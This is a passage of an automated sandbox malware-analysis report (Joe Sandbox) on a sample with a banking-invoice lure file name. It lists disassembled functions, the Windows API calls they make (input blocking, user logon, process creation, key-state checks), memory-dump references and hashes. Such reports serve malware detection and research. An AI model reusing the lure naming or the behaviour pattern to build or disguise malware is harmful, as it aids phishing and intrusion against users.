                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Time$FileSystem__aulldiv__time64
                    • String ID:
                    • API String ID: 2893107130-0
                    • Opcode ID: c3c2058d4321902ea6a21f7fbbe22e97489ff59973ca49996d9db69c8a202987
                    • Instruction ID: 69dd639f6370ea9e0efef30290b574651ad3fc98f53077cfc3ef40bc384e6811
                    • Opcode Fuzzy Hash: c3c2058d4321902ea6a21f7fbbe22e97489ff59973ca49996d9db69c8a202987
                    • Instruction Fuzzy Hash: A6210F766346148BC329CF29D841A52B3E1EBA5320B288E2CD4E9CF2D0CA30B904DB80
                    Function 00F0DA9A Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 00F0DB46
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    • Opcode ID: 0d3ff321ed01c2f4da11dda6e4ac987c967415a7df420af978a018b83c0076e4
                    • Instruction ID: 4fb1dcb72ea0c1f4b43af42faad37ab1ada993309c2a88963aaca34f7b879014
                    • Opcode Fuzzy Hash: 0d3ff321ed01c2f4da11dda6e4ac987c967415a7df420af978a018b83c0076e4
                    • Instruction Fuzzy Hash: 87112C71304125BBFB289EACDC05F7A3B54EB86B30F204314F9519B2D2CBA49D10B3A5
                    Function 00F0D6C6 Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                    • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00EBBBA2,?,?,?,?,00000000,?), ref: 00F0D740
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    • Opcode ID: ea2192bde3af8e231a9eec37d78d2cc8e4b6cb67c3343a21a37cb87cb87142e3
                    • Instruction ID: c59dc7b97fcf1d423b275c99e8d59571712cf2eeae6e3e15de37b4f9deacb6e4
                    • Opcode Fuzzy Hash: ea2192bde3af8e231a9eec37d78d2cc8e4b6cb67c3343a21a37cb87cb87142e3
                    • Instruction Fuzzy Hash: 6F012839A00118ABDB149F69CC85AFA3B95EF46334F040125FA195B1D2C331AC21F7A0
                    Function 00F0C220 Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                      • Part of subcall function 00E82344: GetCursorPos.USER32(?), ref: 00E82357
                      • Part of subcall function 00E82344: ScreenToClient.USER32(00F467B0,?), ref: 00E82374
                      • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000001), ref: 00E82399
                      • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000002), ref: 00E823A7
                    • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00EBBC4F,?,?,?,?,?,00000001,?), ref: 00F0C272
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                    • String ID:
                    • API String ID: 2356834413-0
                    • Opcode ID: 486241387b57c28bdef4c3db962649753b79bebfd1889001375be6c04c59e336
                    • Instruction ID: e72c12b0e09be8d5d00dd00e00119e10347479c3206538ca357b15dd5f637488
                    • Opcode Fuzzy Hash: 486241387b57c28bdef4c3db962649753b79bebfd1889001375be6c04c59e336
                    • Instruction Fuzzy Hash: C6F08234200229ABDF14AF49DC15EBA3B91FB15750F004015F94A6B292CB75A860FBE1
                    Function 00E8189B Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00E81B04,?,?,?,?,?), ref: 00E818E2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    • Opcode ID: 76423fee396527b0b1dfce642a82ac7e58f76ff85857157b4602f67348930afc
                    • Instruction ID: e8b51787bbdbadc6c97366dd8a2a2618093e3ec067cc17b3d20a8a7bf466183f
                    • Opcode Fuzzy Hash: 76423fee396527b0b1dfce642a82ac7e58f76ff85857157b4602f67348930afc
                    • Instruction Fuzzy Hash: 87F0E2342002299FCB18EF04C8519763BE6FB16310F004529FD5A9B2A1DB31DC50FB50
                    Function 00EF41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • BlockInput.USER32(00000001), ref: 00EF4218
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BlockInput
                    • String ID:
                    • API String ID: 3456056419-0
                    • Opcode ID: 06ff683061c7fdd2fdd4af5a2f0d809a02bdd7eacc1208c5865304f774287a29
                    • Instruction ID: c891bf1bded5b8728ad428d14ae2ec52474ef0b3c8f94bd8c10510976f4a24e5
                    • Opcode Fuzzy Hash: 06ff683061c7fdd2fdd4af5a2f0d809a02bdd7eacc1208c5865304f774287a29
                    • Instruction Fuzzy Hash: A5E04FB16402189FD710EF59D844AABF7E8AF94760F049026FD4EE7362DA71E840CBA0
                    Function 00F0CBAE Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00F0CBEE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: DialogNtdllProc_
                    • String ID:
                    • API String ID: 3239928679-0
                    • Opcode ID: 8356f56be6522a0a08f62a9fc6c86a0c4d7a2113ac88e52820c54734f4ca921b
                    • Instruction ID: 8b74e9c60a7ffa7d00fe5f030bb949b9ec38dfdef5bcbfab7de43182914191dd
                    • Opcode Fuzzy Hash: 8356f56be6522a0a08f62a9fc6c86a0c4d7a2113ac88e52820c54734f4ca921b
                    • Instruction Fuzzy Hash: F3F06D31640259AFDB21DF58DC05FD63B95EB1A720F044018BA11672E2CB707820F7A1
                    Function 00EE4EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00EE4F18
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: mouse_event
                    • String ID:
                    • API String ID: 2434400541-0
                    • Opcode ID: 549884106a6c75e4300015d15c68557659b6e6c051c7e8c7ad702628c2459320
                    • Instruction ID: 1a4ca541a22ad41cd57b935374416731587d691eedb7282e1d5c0122d29ad914
                    • Opcode Fuzzy Hash: 549884106a6c75e4300015d15c68557659b6e6c051c7e8c7ad702628c2459320
                    • Instruction Fuzzy Hash: C5D05EF036828D38FC284B22AC1FFB61108F380F85F8479893201B99C698E1A800E035
                    Function 00ED8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00ED88D1), ref: 00ED8CB3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: LogonUser
                    • String ID:
                    • API String ID: 1244722697-0
                    • Opcode ID: 31f2aa72666d1d01ce24b581927bba8983892e8f0e22e082146da5452b67cdaa
                    • Instruction ID: 37e3ecee24e81ee41e28a15fde041224142a1bf97a4e0e383364184ff2a124b7
                    • Opcode Fuzzy Hash: 31f2aa72666d1d01ce24b581927bba8983892e8f0e22e082146da5452b67cdaa
                    • Instruction Fuzzy Hash: DED05E3226050EABEF018EA4DC01EAF3B69EB04B01F408111FE15C50A1C775D835AB60
                    Function 00F0CBF9 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00EBBC0C,?,?,?,?,?,?), ref: 00F0CC24
                      • Part of subcall function 00F0B8EF: _memset.LIBCMT ref: 00F0B8FE
                      • Part of subcall function 00F0B8EF: _memset.LIBCMT ref: 00F0B90D
                      • Part of subcall function 00F0B8EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F47F20,00F47F64), ref: 00F0B93C
                      • Part of subcall function 00F0B8EF: CloseHandle.KERNEL32 ref: 00F0B94E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                    • String ID:
                    • API String ID: 2364484715-0
                    • Opcode ID: 1ca63d34c9d7bcd0f6dfc916afea1a1a61e20ffbf76d91401d89012727601b4a
                    • Instruction ID: 2189a3aac8013fb379830c79113c314819dafd906d1fd735953ab3abed0382b7
                    • Opcode Fuzzy Hash: 1ca63d34c9d7bcd0f6dfc916afea1a1a61e20ffbf76d91401d89012727601b4a
                    • Instruction Fuzzy Hash: 22E01236100208DFDB01AF04DD00E9537A6FB19310F008011FA05572B2CB31A960FF90
                    Function 00E8167D Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00E81AEE,?,?,?), ref: 00E816AB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    • Opcode ID: f35936fb4a2114c7c66673f75911c180a84147bc8ddf5a3068af89ae08803c7e
                    • Instruction ID: 0eae2c4ae49221a58af733f4d3536ff6f160587821a1be0a8ff1963262d205a7
                    • Opcode Fuzzy Hash: f35936fb4a2114c7c66673f75911c180a84147bc8ddf5a3068af89ae08803c7e
                    • Instruction Fuzzy Hash: 51E0EC35100208BBCF15AF90DC11E643B66FB59714F108418FA495A2A2CE32A522FB51
                    Function 00F0CB7F Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtdllDialogWndProc_W.NTDLL ref: 00F0CBA4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: DialogNtdllProc_
                    • String ID:
                    • API String ID: 3239928679-0
                    • Opcode ID: d51f752ece4dc8345863a53258f40901de601170134b2e3f9a07c027ed7106f6
                    • Instruction ID: a875423bf605cdb0e07130e50fe7f606f6cd2f0789ec4368e5f09a80c7057a65
                    • Opcode Fuzzy Hash: d51f752ece4dc8345863a53258f40901de601170134b2e3f9a07c027ed7106f6
                    • Instruction Fuzzy Hash: 47E0427924024DEFDB01DF88D945DD63BA5BB1E700F054054FE1557262CB71A864EBA2
                    Function 00F0CB50 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtdllDialogWndProc_W.NTDLL ref: 00F0CB75
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: DialogNtdllProc_
                    • String ID:
                    • API String ID: 3239928679-0
                    • Opcode ID: 7fee1a3d01bc36e118ac539ad620a3574e71f7647306f1679745c214445ef035
                    • Instruction ID: 41a4f116101ccd8263379565ef6fde5c8f9c86ef93c39ac67e1dc84e0d12c496
                    • Opcode Fuzzy Hash: 7fee1a3d01bc36e118ac539ad620a3574e71f7647306f1679745c214445ef035
                    • Instruction Fuzzy Hash: 96E0427924424DAFDB01DF88DC85E963BA5BB1E700F054054FE1557262CB71A820EB62
                    Function 00E816B5 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                      • Part of subcall function 00E8201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E820D3
                      • Part of subcall function 00E8201B: KillTimer.USER32(-00000001,?,?,?,?,00E816CB,00000000,?,?,00E81AE2,?,?), ref: 00E8216E
                    • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00E81AE2,?,?), ref: 00E816D4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                    • String ID:
                    • API String ID: 2797419724-0
                    • Opcode ID: 2712284b873b8c909728df3b74002537a18ffb18a4a65ab6c62eb5d1917fefa3
                    • Instruction ID: fd1d1bde70cd02b0948d7165296ee004352640cbee38d21789279e092deabaa1
                    • Opcode Fuzzy Hash: 2712284b873b8c909728df3b74002537a18ffb18a4a65ab6c62eb5d1917fefa3
                    • Instruction Fuzzy Hash: BFD0127014030877DA207B50DC17F593E5D9B18B50F408025BB0C791D3DA716810B659
                    Function 00EC2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                    Download Yara Rule
                    APIs
                    • GetUserNameW.ADVAPI32(?,?), ref: 00EC2242
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: fec7ee42e30ead8fb162776788fbc67843d6410fce854e8c90220a4130907b48
                    • Instruction ID: 1a02be1c6492fbf84946b86345d5c17a681eb3db61d674938289bbc0ebe52abf
                    • Opcode Fuzzy Hash: fec7ee42e30ead8fb162776788fbc67843d6410fce854e8c90220a4130907b48
                    • Instruction Fuzzy Hash: 4EC04CF1C0010DDBDB15DB90DA88DEE77BCBB04304F104095A101F2101D7749B449E71
                    Function 00EAA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00EAA36A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
